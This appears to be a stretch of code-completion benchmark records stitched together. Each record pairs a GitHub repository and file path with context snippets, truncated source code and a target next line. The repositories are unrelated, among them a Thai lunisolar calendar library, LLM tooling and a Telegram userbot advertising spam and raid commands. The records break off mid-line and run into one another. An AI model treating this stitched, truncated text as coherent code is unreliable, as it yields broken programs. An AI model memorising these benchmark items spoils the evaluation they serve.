"exclude", MOCK_MODEL_FIELD_COMBINATIONS[:25] + MOCK_MODEL_FIELD_COMBINATIONS[-25:]
)
@pytest.mark.parametrize("prompt_to_keep_existing", [True, False])
def test_prompt_for_missing(existing, exclude, prompt_to_keep_existing, monkeypatch):
"""Test the prompt_for_missing_fields function."""
mock_prompt_to_keep = Mock()
mock_prompt_for_field_by_type = Mock()
monkeypatch.setattr(
"geneweaver.client.utils.cli.prompt.pydantic.prompt_to_keep_field",
mock_prompt_to_keep,
)
monkeypatch.setattr(
"geneweaver.client.utils.cli.prompt.pydantic.prompt_for_field_by_type",
mock_prompt_for_field_by_type,
)
prompt_for_missing_fields(MockModel, existing, exclude, prompt_to_keep_existing)
# We should prompt for every field in `existing` that is not in `exclude`.
if prompt_to_keep_existing and len(existing) > 0:
assert mock_prompt_to_keep.call_count == len(set(existing.keys()) - exclude)
# We should prompt for every field in `MockModel` that is not in
# `existing` or `exclude`.
assert mock_prompt_for_field_by_type.call_count == len( | set(MOCK_MODEL_FIELDS) - set(existing.keys()) - exclude | 2 | 2023-11-10 19:28:53+00:00 | 2k |
hmmbug/pythaidate | pythaidate/lsyear.py | [
{
"identifier": "DAYS_IN_800_YEARS",
"path": "pythaidate/constants.py",
"snippet": "DAYS_IN_800_YEARS = 292207"
},
{
"identifier": "TIME_UNITS_IN_1_DAY",
"path": "pythaidate/constants.py",
"snippet": "TIME_UNITS_IN_1_DAY = 800"
},
{
"identifier": "EPOCH_OFFSET",
"path": "pyth... | from .constants import (
DAYS_IN_800_YEARS,
TIME_UNITS_IN_1_DAY,
EPOCH_OFFSET,
UCCAPON_CONSTANT,
APOGEE_ROTATION_DAYS,
CAL_TYPE_DAY_COUNTS,
) | 1,012 |
class LSYear:
"""
A lightweight class representing a lunisolar year on new year's day.
"""
def __init__(self, year: int):
self.offset = False # adjusted later
self.year = year
# this year
self.horakhun = (year * DAYS_IN_800_YEARS + EPOCH_OFFSET) // TIME_UNITS_IN_1_DAY + 1
self.kammacapon = TIME_UNITS_IN_1_DAY - (year * DAYS_IN_800_YEARS + EPOCH_OFFSET) % TIME_UNITS_IN_1_DAY
# ucc_i = (2611 + self.ahargana) // APOGEE_ROTATION_DAYS
self.uccapon = (UCCAPON_CONSTANT + self.horakhun) % APOGEE_ROTATION_DAYS
avo_quot = (self.horakhun * 11 + 650) // 692
self.avoman = (self.horakhun * 11 + 650) % 692
if self.avoman == 0:
self.avoman = 692
self.masaken = (avo_quot + self.horakhun) // 30
self.tithi = (avo_quot + self.horakhun) % 30
if self.avoman == 692:
self.tithi -= 1
# rest_quot = self.horakhun // 7
self.weekday = self.horakhun % 7
# next year
horakhun1 = ((year + 1) * DAYS_IN_800_YEARS + EPOCH_OFFSET) // TIME_UNITS_IN_1_DAY + 1
quot1 = (horakhun1 * 11 + 650) // 692
# avo1 = (ahargana1 * 11 + 650) % 692
# mas1 = (quot1 + ahargana1) // 30
tithi1 = (quot1 + horakhun1) % 30
# Faraut, pg 28
self.langsak = max(1, self.tithi)
self.nyd = self.langsak
if self.nyd < 6:
self.nyd += 29
self.nyd = (self.weekday - self.nyd + 1 + 35) % 7
# is there a solar year leap day?
self.leapday = self.kammacapon <= 207
# A: normal year, 354 days; B: leap day, 355 days; C: leap month, 384 days
self.cal_type = 'A' # normal year
if self.tithi > 24 or self.tithi < 6:
self.cal_type = 'C' # leap month
if self.tithi == 25 and tithi1 == 5:
self.cal_type = 'A'
if (self.leapday and self.avoman <= 126) or (not self.leapday and self.avoman <= 137):
self.cal_type = 'B' if self.cal_type != 'C' else 'c'
# start of next year
if self.cal_type == 'A':
self.next_nyd = (self.nyd + 4) % 7
elif self.cal_type == 'B':
self.next_nyd = (self.nyd + 5) % 7
elif self.cal_type == 'C' or self.cal_type == 'c':
self.next_nyd = (self.nyd + 6) % 7
|
class LSYear:
"""
A lightweight class representing a lunisolar year on new year's day.
"""
def __init__(self, year: int):
self.offset = False # adjusted later
self.year = year
# this year
self.horakhun = (year * DAYS_IN_800_YEARS + EPOCH_OFFSET) // TIME_UNITS_IN_1_DAY + 1
self.kammacapon = TIME_UNITS_IN_1_DAY - (year * DAYS_IN_800_YEARS + EPOCH_OFFSET) % TIME_UNITS_IN_1_DAY
# ucc_i = (2611 + self.ahargana) // APOGEE_ROTATION_DAYS
self.uccapon = (UCCAPON_CONSTANT + self.horakhun) % APOGEE_ROTATION_DAYS
avo_quot = (self.horakhun * 11 + 650) // 692
self.avoman = (self.horakhun * 11 + 650) % 692
if self.avoman == 0:
self.avoman = 692
self.masaken = (avo_quot + self.horakhun) // 30
self.tithi = (avo_quot + self.horakhun) % 30
if self.avoman == 692:
self.tithi -= 1
# rest_quot = self.horakhun // 7
self.weekday = self.horakhun % 7
# next year
horakhun1 = ((year + 1) * DAYS_IN_800_YEARS + EPOCH_OFFSET) // TIME_UNITS_IN_1_DAY + 1
quot1 = (horakhun1 * 11 + 650) // 692
# avo1 = (ahargana1 * 11 + 650) % 692
# mas1 = (quot1 + ahargana1) // 30
tithi1 = (quot1 + horakhun1) % 30
# Faraut, pg 28
self.langsak = max(1, self.tithi)
self.nyd = self.langsak
if self.nyd < 6:
self.nyd += 29
self.nyd = (self.weekday - self.nyd + 1 + 35) % 7
# is there a solar year leap day?
self.leapday = self.kammacapon <= 207
# A: normal year, 354 days; B: leap day, 355 days; C: leap month, 384 days
self.cal_type = 'A' # normal year
if self.tithi > 24 or self.tithi < 6:
self.cal_type = 'C' # leap month
if self.tithi == 25 and tithi1 == 5:
self.cal_type = 'A'
if (self.leapday and self.avoman <= 126) or (not self.leapday and self.avoman <= 137):
self.cal_type = 'B' if self.cal_type != 'C' else 'c'
# start of next year
if self.cal_type == 'A':
self.next_nyd = (self.nyd + 4) % 7
elif self.cal_type == 'B':
self.next_nyd = (self.nyd + 5) % 7
elif self.cal_type == 'C' or self.cal_type == 'c':
self.next_nyd = (self.nyd + 6) % 7 | self.caldays = CAL_TYPE_DAY_COUNTS[self.cal_type] | 5 | 2023-11-18 21:14:01+00:00 | 2k |
finalparanoia/Bert-VITS2-Preprocess | main.py | [
{
"identifier": "create",
"path": "utils/create.py",
"snippet": "def create(dataset_name: str):\n raw_files = ls(f\"{raw_dir}/*.wav\")\n current_dataset_path = f\"{dataset_dir}/{dataset_name}\"\n i = 0\n\n if exist(current_dataset_path):\n mv(current_dataset_path, current_dataset_path... | from utils.create import create
from utils.tag import tag
from utils.resample import resample
from utils.clean import clean
from utils.model_conf import gen_config | 935 |
if __name__ == "__main__":
pass
dataset_name = input("请为数据集命名:")
create(dataset_name)
resample(dataset_name)
tag(dataset_name)
clean(dataset_name)
|
if __name__ == "__main__":
pass
dataset_name = input("请为数据集命名:")
create(dataset_name)
resample(dataset_name)
tag(dataset_name)
clean(dataset_name) | gen_config(dataset_name) | 4 | 2023-11-12 09:42:20+00:00 | 2k |
itzshukla/STRANGER-SPAM | TheXSpam/extra.py | [
{
"identifier": "SUDO_USERS",
"path": "config.py",
"snippet": "SUDO_USERS = list(map(lambda x: int(x), getenv(\"SUDO_USERS\", \"6163010926\").split(\" \")))"
},
{
"identifier": "ALIVE_PIC",
"path": "config.py",
"snippet": "ALIVE_PIC = getenv(\"ALIVE_PIC\", \"https://telegra.ph/file/aa4bf... | import heroku3
from os import getenv
from config import SUDO_USERS, ALIVE_PIC, OWNER_ID, HEROKU_APP_NAME, HEROKU_API_KEY
from pyrogram import Client, filters
from pyrogram.types import Message
| 724 | # © @shiva_ansh_op
FIRST_TEXT = f"""★ 𝗦𝘁𝗿𝗮𝗻𝗴𝗲𝗿-𝙎𝙥𝙖𝙢 𝙃𝙚𝙡𝙥 𝙈𝙚𝙣𝙪 ★
**» ʙᴏᴛ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/5)
**» ʀᴀɪᴅ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/6)
**» ꜱᴘᴀᴍ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/7)
**» ᴅᴍ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/8)"""
@Client.on_message(filters.user(SUDO_USERS) & filters.command(["help"], [".", "!", "/"]))
async def help(client: Client, message: Message):
await client.send_photo(
chat_id=message.chat.id,
photo=ALIVE_PIC,
caption=FIRST_TEXT
)
@Client.on_message(filters.user(OWNER_ID) & filters.command(["sudo"], ["/", ".", "!"]))
async def add_sudo(_, message: Message):
if not message.reply_to_message:
await message.reply_text("» ʀᴇᴘʟʏ ᴛᴏ ᴀ ᴜꜱᴇʀ !!")
return
| # © @shiva_ansh_op
FIRST_TEXT = f"""★ 𝗦𝘁𝗿𝗮𝗻𝗴𝗲𝗿-𝙎𝙥𝙖𝙢 𝙃𝙚𝙡𝙥 𝙈𝙚𝙣𝙪 ★
**» ʙᴏᴛ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/5)
**» ʀᴀɪᴅ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/6)
**» ꜱᴘᴀᴍ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/7)
**» ᴅᴍ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/8)"""
@Client.on_message(filters.user(SUDO_USERS) & filters.command(["help"], [".", "!", "/"]))
async def help(client: Client, message: Message):
await client.send_photo(
chat_id=message.chat.id,
photo=ALIVE_PIC,
caption=FIRST_TEXT
)
@Client.on_message(filters.user(OWNER_ID) & filters.command(["sudo"], ["/", ".", "!"]))
async def add_sudo(_, message: Message):
if not message.reply_to_message:
await message.reply_text("» ʀᴇᴘʟʏ ᴛᴏ ᴀ ᴜꜱᴇʀ !!")
return
| elif HEROKU_APP_NAME is None:
| 3 | 2023-11-14 05:14:00+00:00 | 2k |
fg320/DEASC | deasc/wf_model.py | [
{
"identifier": "floris_input_handler",
"path": "deasc/utils_floris.py",
"snippet": "def floris_input_handler(input_file, path):\n \"\"\"Convert input file into a FLORIS interface object.\"\"\"\n # No input file\n if input_file == None:\n err_msg = \"Input file required\"\n raise ... | import warnings
import numpy as np
from .utils_floris import (
floris_input_handler,
floris_properties,
floris_current_yaw,
floris_reinitialise_layout,
floris_farm_eval
) | 1,390 | # Copyright 2023 Filippo Gori
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
class WfModel:
"""
Class for wind farm modelling (Interface setup but not limited to FLORIS
framework).
"""
def __init__(self, input_file, path):
"""
Initialise wind farm object by pointing towards an input file.
(FLORIS interface object).
Args
----
input file:(FLORIS .json input file).
"""
# Read and initialize input file
self.input_file = input_file
self.interface = floris_input_handler(self.input_file, path)
# Assign wind farm model proporties
| # Copyright 2023 Filippo Gori
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
class WfModel:
"""
Class for wind farm modelling (Interface setup but not limited to FLORIS
framework).
"""
def __init__(self, input_file, path):
"""
Initialise wind farm object by pointing towards an input file.
(FLORIS interface object).
Args
----
input file:(FLORIS .json input file).
"""
# Read and initialize input file
self.input_file = input_file
self.interface = floris_input_handler(self.input_file, path)
# Assign wind farm model proporties | self.D, self.H_hub, self.n_turbs = floris_properties(self) | 1 | 2023-11-10 18:13:27+00:00 | 2k |
CPES-Power-and-Energy-Systems/interoperable-recommender-tso | energy_app/src/energy_app_client/Controller.py | [
{
"identifier": "Endpoint",
"path": "energy_app/src/energy_app_client/Endpoint.py",
"snippet": "class Endpoint:"
},
{
"identifier": "RequestController",
"path": "energy_app/src/energy_app_client/RequestController.py",
"snippet": "class RequestController:\n \"\"\"\n Manages api call... | from time import time
from loguru import logger
from http import HTTPStatus
from .Endpoint import Endpoint, post_actions
from .RequestController import RequestController
from .exception import LoginException, PostActionsException | 965 |
class Controller(RequestController):
def __init__(self):
RequestController.__init__(self)
self.access_token = ""
def __check_if_token_exists(self):
if self.access_token is None:
e_msg = "Access token is not yet available. Login first."
logger.error(e_msg)
raise ValueError(e_msg)
def set_access_token(self, token):
self.access_token = token
def login(self, email: str, password: str):
raise NotImplementedError("Method not implemented.")
def __request_template(self,
|
class Controller(RequestController):
def __init__(self):
RequestController.__init__(self)
self.access_token = ""
def __check_if_token_exists(self):
if self.access_token is None:
e_msg = "Access token is not yet available. Login first."
logger.error(e_msg)
raise ValueError(e_msg)
def set_access_token(self, token):
self.access_token = token
def login(self, email: str, password: str):
raise NotImplementedError("Method not implemented.")
def __request_template(self, | endpoint_cls: Endpoint, | 0 | 2023-11-17 09:23:38+00:00 | 2k |
PlaxtonFlarion/NexaFlow | nexaflow/hook.py | [
{
"identifier": "toolbox",
"path": "nexaflow/toolbox.py",
"snippet": "def video_capture(video_path: str):\ndef video_jump(video_cap: cv2.VideoCapture, frame_id: int):\ndef compare_ssim(pic1: np.ndarray, pic2: np.ndarray) -> float:\ndef multi_compare_ssim(\n pic1_list: typing.List, pic2_list: typing.L... | import os
import cv2
import typing
from loguru import logger
from nexaflow import toolbox
from nexaflow.video import VideoFrame | 1,228 |
class BaseHook(object):
def __init__(self, *_, **__):
# logger.debug(f"start initialing: {self.__class__.__name__} ...")
logger.info(f"加载视频帧处理单元: Frame Processor {self.__class__.__name__} ...")
self.result = dict()
def do(self, frame: VideoFrame, *_, **__) -> typing.Optional[VideoFrame]:
# info = f"execute hook: {self.__class__.__name__}"
frame_id = frame.frame_id
if frame_id != -1:
# logger.debug(f"{info}, frame id: {frame_id}")
pass
return frame
class ExampleHook(BaseHook):
def __init__(self, *_, **__):
super().__init__(*_, **__)
def do(self, frame: VideoFrame, *_, **__) -> typing.Optional[VideoFrame]:
super().do(frame, *_, **__)
|
class BaseHook(object):
def __init__(self, *_, **__):
# logger.debug(f"start initialing: {self.__class__.__name__} ...")
logger.info(f"加载视频帧处理单元: Frame Processor {self.__class__.__name__} ...")
self.result = dict()
def do(self, frame: VideoFrame, *_, **__) -> typing.Optional[VideoFrame]:
# info = f"execute hook: {self.__class__.__name__}"
frame_id = frame.frame_id
if frame_id != -1:
# logger.debug(f"{info}, frame id: {frame_id}")
pass
return frame
class ExampleHook(BaseHook):
def __init__(self, *_, **__):
super().__init__(*_, **__)
def do(self, frame: VideoFrame, *_, **__) -> typing.Optional[VideoFrame]:
super().do(frame, *_, **__) | frame.data = toolbox.turn_grey(frame.data) | 0 | 2023-11-13 05:27:34+00:00 | 2k |
OpenBMB/XAgent | tests/test_run.py | [
{
"identifier": "parse_args",
"path": "run.py",
"snippet": "def parse_args() -> argparse.Namespace:\n \"\"\"\n Parse the command line arguments and return them as an argparse.Namespace object.\n\n Returns:\n argparse.Namespace: An object containing command line arguments and their values... | import pytest
import sys
from run import parse_args, execute_command_line_process, start_command_line
from unittest.mock import patch | 1,008 |
@pytest.fixture
def mock_argv(monkeypatch):
"""
A pytest fixture to mock the command line arguments.
It sets the sys.argv to mimic command line input for testing.
"""
test_args = ["--task", "example_task", "--upload-files", "file1", "file2", "--model", "model1"]
monkeypatch.setattr(sys, 'argv', ['test_script.py'] + test_args)
def test_parse_args(mock_argv):
"""
Test to ensure that the parse_args function correctly parses command line arguments.
"""
|
@pytest.fixture
def mock_argv(monkeypatch):
"""
A pytest fixture to mock the command line arguments.
It sets the sys.argv to mimic command line input for testing.
"""
test_args = ["--task", "example_task", "--upload-files", "file1", "file2", "--model", "model1"]
monkeypatch.setattr(sys, 'argv', ['test_script.py'] + test_args)
def test_parse_args(mock_argv):
"""
Test to ensure that the parse_args function correctly parses command line arguments.
""" | args = parse_args() | 0 | 2023-10-16 03:44:57+00:00 | 2k |
pytorch-labs/gpt-fast | GPTQ.py | [
{
"identifier": "setup_cache_padded_seq_input_pos_max_seq_length_for_prefill",
"path": "eval.py",
"snippet": "def setup_cache_padded_seq_input_pos_max_seq_length_for_prefill(\n model: LLaMA,\n prompt: torch.Tensor,\n max_new_tokens: int,\n max_seq_length: Optional[int] = None,\n):\n \"\"\... | import os
import sys
import torch
import main as lm_evaluation_harness_main
import torch.fx as fx
import torch.nn as nn
import torch.nn.functional as F
import lm_eval
from torch.utils._pytree import tree_flatten, tree_unflatten
from eval import setup_cache_padded_seq_input_pos_max_seq_length_for_prefill
from generate import encode_tokens | 1,471 |
aten = torch.ops.aten
try:
class InputRecorder(lm_eval.base.BaseLM):
"""
This is a fake evaluation wrapper that just records the inputs
so that they can be used in calibration.
If pad_calibration_inputs is enabled, the input recorder will take
each input and pad/truncate it down to the calibration_seq_length.
It will also edit the model embeddings to be zero for the 0 token used
in padding and avoid any inputs with the 0 token.
If not, it will only truncate inputs to the desired length.
"""
def __init__(
self,
model,
tokenizer,
calibration_seq_length,
pad_calibration_inputs=False,
):
super().__init__()
self._model = model
self._tokenizer = tokenizer
self._device = torch.device("cpu")
self.vocab_size = model.config.vocab_size
self.calibration_seq_length = calibration_seq_length
self.pad_calibration_inputs = pad_calibration_inputs
self.inputs = None
if self.pad_calibration_inputs:
# This is needed for the pad_calibration_inputs option
# to work properly, the 0 token's embeddings are set to 0 so that
# the padded inputs will not affect the model numerics. This token isn't used
# commonly in the eval tasks for the meta-llama tokenizer and we skip any inputs
# where it appears
try:
if isinstance(self._model.transformer.wte, nn.Embedding):
self.mod.transformer.wte.weight.data[0, :] *= 0
except:
print(
"Did not find embeddings in model.transformer.wte, disabling padding"
)
self.pad_calibration_inputs = False
@property
def eot_token_id(self):
return self._tokenizer.eos_id()
@property
def max_length(self):
return self.calibration_seq_length
@property
def max_gen_toks(self):
return 50
@property
def batch_size(self):
return 1
@property
def device(self):
return self._device
def tok_encode(self, string: str):
encoded = encode_tokens(
self._tokenizer, string, bos=True, eos=False, device=self._device
)
# encoded is a pytorch tensor, but some internal logic in the
# eval harness expects it to be a list instead
# TODO: verify this for multi-batch as well
encoded = encoded.tolist()
return encoded
def tok_decode(self, tokens):
decoded = self._tokenizer.decode(tokens)
return decoded
def add_input(self, args):
if self.inputs is None:
self.inputs = [MultiInput([arg]) for arg in args]
else:
self.inputs = [
multi.add_input(arg) for (multi, arg) in zip(self.inputs, args)
]
def get_recorded_inputs(self):
return self.inputs
def _model_call(self, inps):
inps = inps.squeeze(0)
T = len(inps)
if (
# can't use inputs that are too short when padding disabled
(T < self.calibration_seq_length and not self.pad_calibration_inputs)
or
# can't use inputs that actually use token we use for padding
(self.pad_calibration_inputs and 0 in inps)
):
# give random output
return torch.randn(
(1, T, self.vocab_size), dtype=torch.bfloat16, device=self._device
)
# pad or truncate to the right size
if T >= self.calibration_seq_length:
inps = inps[: self.calibration_seq_length]
else:
inps = F.pad(inps, (0, self.calibration_seq_length - T))
max_new_tokens = 1
(
seq,
input_pos,
max_seq_length,
| # Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
lm_evaluation_harness_path = "/".join(
os.getcwd().split("/")[:-1] + ["lm-evaluation-harness"]
)
sys.path.insert(0, lm_evaluation_harness_path)
aten = torch.ops.aten
try:
class InputRecorder(lm_eval.base.BaseLM):
"""
This is a fake evaluation wrapper that just records the inputs
so that they can be used in calibration.
If pad_calibration_inputs is enabled, the input recorder will take
each input and pad/truncate it down to the calibration_seq_length.
It will also edit the model embeddings to be zero for the 0 token used
in padding and avoid any inputs with the 0 token.
If not, it will only truncate inputs to the desired length.
"""
def __init__(
self,
model,
tokenizer,
calibration_seq_length,
pad_calibration_inputs=False,
):
super().__init__()
self._model = model
self._tokenizer = tokenizer
self._device = torch.device("cpu")
self.vocab_size = model.config.vocab_size
self.calibration_seq_length = calibration_seq_length
self.pad_calibration_inputs = pad_calibration_inputs
self.inputs = None
if self.pad_calibration_inputs:
# This is needed for the pad_calibration_inputs option
# to work properly, the 0 token's embeddings are set to 0 so that
# the padded inputs will not affect the model numerics. This token isn't used
# commonly in the eval tasks for the meta-llama tokenizer and we skip any inputs
# where it appears
try:
if isinstance(self._model.transformer.wte, nn.Embedding):
self.mod.transformer.wte.weight.data[0, :] *= 0
except:
print(
"Did not find embeddings in model.transformer.wte, disabling padding"
)
self.pad_calibration_inputs = False
@property
def eot_token_id(self):
return self._tokenizer.eos_id()
@property
def max_length(self):
return self.calibration_seq_length
@property
def max_gen_toks(self):
return 50
@property
def batch_size(self):
return 1
@property
def device(self):
return self._device
def tok_encode(self, string: str):
encoded = encode_tokens(
self._tokenizer, string, bos=True, eos=False, device=self._device
)
# encoded is a pytorch tensor, but some internal logic in the
# eval harness expects it to be a list instead
# TODO: verify this for multi-batch as well
encoded = encoded.tolist()
return encoded
def tok_decode(self, tokens):
decoded = self._tokenizer.decode(tokens)
return decoded
def add_input(self, args):
if self.inputs is None:
self.inputs = [MultiInput([arg]) for arg in args]
else:
self.inputs = [
multi.add_input(arg) for (multi, arg) in zip(self.inputs, args)
]
def get_recorded_inputs(self):
return self.inputs
def _model_call(self, inps):
inps = inps.squeeze(0)
T = len(inps)
if (
# can't use inputs that are too short when padding disabled
(T < self.calibration_seq_length and not self.pad_calibration_inputs)
or
# can't use inputs that actually use token we use for padding
(self.pad_calibration_inputs and 0 in inps)
):
# give random output
return torch.randn(
(1, T, self.vocab_size), dtype=torch.bfloat16, device=self._device
)
# pad or truncate to the right size
if T >= self.calibration_seq_length:
inps = inps[: self.calibration_seq_length]
else:
inps = F.pad(inps, (0, self.calibration_seq_length - T))
max_new_tokens = 1
(
seq,
input_pos,
max_seq_length, | ) = setup_cache_padded_seq_input_pos_max_seq_length_for_prefill( | 0 | 2023-10-17 05:30:32+00:00 | 2k |
deepseek-ai/DeepSeek-Coder | Evaluation/MBPP/human_eval/evaluate_functional_correctness.py | [
{
"identifier": "HUMAN_EVAL",
"path": "Evaluation/MBPP/human_eval/data.py",
"snippet": "HUMAN_EVAL = os.path.join(ROOT, \"..\", \"data\", \"HumanEval.jsonl.gz\")"
},
{
"identifier": "evaluate_functional_correctness",
"path": "Evaluation/MBPP/human_eval/evaluation.py",
"snippet": "def eva... | import fire
import sys
from .data import HUMAN_EVAL
from .evaluation import evaluate_functional_correctness | 1,125 |
def entry_point(
sample_file: str,
k: str = "1,10,100",
n_workers: int = 4,
timeout: float = 3.0,
problem_file: str = "",
is_mbpp: bool = False,
):
"""
Evaluates the functional correctness of generated samples, and writes
results to f"{sample_file}_results.jsonl.gz"
"""
k = list(map(int, k.split(",")))
|
def entry_point(
sample_file: str,
k: str = "1,10,100",
n_workers: int = 4,
timeout: float = 3.0,
problem_file: str = "",
is_mbpp: bool = False,
):
"""
Evaluates the functional correctness of generated samples, and writes
results to f"{sample_file}_results.jsonl.gz"
"""
k = list(map(int, k.split(","))) | results = evaluate_functional_correctness(sample_file, k, n_workers, timeout, problem_file, is_mbpp) | 1 | 2023-10-20 06:38:01+00:00 | 2k |
PKU-YuanGroup/Video-LLaVA | llava/model/llava_arch.py | [
{
"identifier": "build_image_tower",
"path": "llava/model/multimodal_encoder/builder.py",
"snippet": "def build_image_tower(image_tower_cfg, **kwargs):\n image_tower = getattr(image_tower_cfg, 'mm_image_tower', getattr(image_tower_cfg, 'image_tower', None))\n is_absolute_path_exists = os.path.exis... | from abc import ABC, abstractmethod
from .multimodal_encoder.builder import build_image_tower, build_video_tower
from .multimodal_projector.builder import build_vision_projector
from llava.constants import IGNORE_INDEX, X_TOKEN_INDEX, DEFAULT_X_PATCH_TOKEN, DEFAULT_X_START_TOKEN, DEFAULT_X_END_TOKEN
import torch
import torch.nn as nn | 1,164 | # Copyright 2023 Haotian Liu
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class LlavaMetaModel:
def __init__(self, config):
super(LlavaMetaModel, self).__init__(config)
if hasattr(config, "mm_image_tower"):
self.image_tower = build_image_tower(config, delay_load=True)
| # Copyright 2023 Haotian Liu
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class LlavaMetaModel:
def __init__(self, config):
super(LlavaMetaModel, self).__init__(config)
if hasattr(config, "mm_image_tower"):
self.image_tower = build_image_tower(config, delay_load=True) | self.mm_projector = build_vision_projector(config) | 2 | 2023-10-23 05:43:54+00:00 | 2k |
deepseek-ai/DreamCraft3D | extern/ldm_zero123/models/diffusion/ddim.py | [
{
"identifier": "norm_thresholding",
"path": "extern/ldm_zero123/models/diffusion/sampling_util.py",
"snippet": "def norm_thresholding(x0, value):\n s = append_dims(x0.pow(2).flatten(1).mean(1).sqrt().clamp(min=value), x0.ndim)\n return x0 * (value / s)"
},
{
"identifier": "renorm_threshol... | from functools import partial
from tqdm import tqdm
from extern.ldm_zero123.models.diffusion.sampling_util import (
norm_thresholding,
renorm_thresholding,
spatial_norm_thresholding,
)
from extern.ldm_zero123.modules.diffusionmodules.util import (
extract_into_tensor,
make_ddim_sampling_parameters,
make_ddim_timesteps,
noise_like,
)
import numpy as np
import torch | 1,515 | """SAMPLING ONLY."""
class DDIMSampler(object):
def __init__(self, model, schedule="linear", **kwargs):
super().__init__()
self.model = model
self.ddpm_num_timesteps = model.num_timesteps
self.schedule = schedule
def to(self, device):
"""Same as to in torch module
Don't really underestand why this isn't a module in the first place"""
for k, v in self.__dict__.items():
if isinstance(v, torch.Tensor):
new_v = getattr(self, k).to(device)
setattr(self, k, new_v)
def register_buffer(self, name, attr):
if type(attr) == torch.Tensor:
if attr.device != torch.device("cuda"):
attr = attr.to(torch.device("cuda"))
setattr(self, name, attr)
def make_schedule(
self, ddim_num_steps, ddim_discretize="uniform", ddim_eta=0.0, verbose=True
):
| """SAMPLING ONLY."""
class DDIMSampler(object):
def __init__(self, model, schedule="linear", **kwargs):
super().__init__()
self.model = model
self.ddpm_num_timesteps = model.num_timesteps
self.schedule = schedule
def to(self, device):
"""Same as to in torch module
Don't really underestand why this isn't a module in the first place"""
for k, v in self.__dict__.items():
if isinstance(v, torch.Tensor):
new_v = getattr(self, k).to(device)
setattr(self, k, new_v)
def register_buffer(self, name, attr):
if type(attr) == torch.Tensor:
if attr.device != torch.device("cuda"):
attr = attr.to(torch.device("cuda"))
setattr(self, name, attr)
def make_schedule(
self, ddim_num_steps, ddim_discretize="uniform", ddim_eta=0.0, verbose=True
): | self.ddim_timesteps = make_ddim_timesteps( | 5 | 2023-10-23 07:40:20+00:00 | 2k |
YORG-AI/Open-Assistant | package/src/yorgassistant/core/nodes/github/github_search.py | [
{
"identifier": "BaseNode",
"path": "package/src/yorgassistant/core/nodes/base_node.py",
"snippet": "class BaseNode(ABC):\n config: NodeConfig\n func_mapping: dict[str, Callable]\n\n def __init__(self):\n # initialize func_mapping\n self.func_mapping = {}\n avail_funcs = [\... | from ..base_node import BaseNode, NodeConfig
from .github_node import GithubNode
from .github_model import (
SearchCodeInput,
SearchCommitsInput,
SearchIssuesAndPRsInput,
SearchLabelsInput,
SearchRepositoriesInput,
SearchTopicsInput,
SearchUsersInput,
) | 889 |
github_search_node_config = {
"name": "github_search",
"description": "A node for searching various entities on GitHub.",
"functions": {
"search_code": "Search code.",
"search_commits": "Search commits.",
"search_issues_and_prs": "Search issues and pull requests.",
"search_labels": "Search labels.",
"search_repositories": "Search repositories.",
"search_topics": "Search topics.",
"search_users": "Search users.",
},
}
|
github_search_node_config = {
"name": "github_search",
"description": "A node for searching various entities on GitHub.",
"functions": {
"search_code": "Search code.",
"search_commits": "Search commits.",
"search_issues_and_prs": "Search issues and pull requests.",
"search_labels": "Search labels.",
"search_repositories": "Search repositories.",
"search_topics": "Search topics.",
"search_users": "Search users.",
},
}
| class GithubSearchNode(GithubNode): | 2 | 2023-10-24 15:15:48+00:00 | 2k |
zju3dv/4K4D | scripts/realtime4dv/charger.py | [
{
"identifier": "to_numpy",
"path": "easyvolcap/utils/data_utils.py",
"snippet": "def to_numpy(batch, non_blocking=False, ignore_list: bool = False) -> Union[List, Dict, np.ndarray]: # almost always exporting, should block\n if isinstance(batch, (tuple, list)) and not ignore_list:\n batch = [... | from os.path import join
from easyvolcap.utils.console_utils import *
from easyvolcap.utils.data_utils import to_numpy
from easyvolcap.utils.net_utils import save_npz
